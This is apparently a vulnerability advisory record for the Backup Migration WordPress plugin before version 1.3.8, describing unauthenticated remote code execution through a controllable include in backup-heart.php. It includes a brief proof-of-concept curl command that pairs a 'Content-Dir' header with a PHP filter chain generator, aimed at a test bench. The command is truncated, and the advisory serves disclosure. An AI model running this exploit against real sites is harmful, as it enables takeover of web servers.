Lucene search

K
wpvulndbWpvulndbWPVDB-ID:6A4D0AF9-E1CD-4A69-A56C-3C009E207ECA
HistoryDec 12, 2023 - 12:00 a.m.

Backup Migration < 1.3.8 - Unauthenticated RCE

2023-12-1200:00:00
wpscan.com
41
vulnerability
remote code execution
unauthenticated access
php filter chain
attack
server security

AI Score

10

Confidence

High

EPSS

0.948

Percentile

99.3%

Description The plugin is vulnerable to Remote Code Execution via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.

PoC

Using the PHP Filter Chain Generator: https://github.com/synacktiv/php_filter_chain_generator time curl -X POST http://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/backup-backup/includes/backup-heart.php -H “Content-Dir: python3 ./php_filter_chain_generator.py --chain '' | grep --color=never '^php://filter'

AI Score

10

Confidence

High

EPSS

0.948

Percentile

99.3%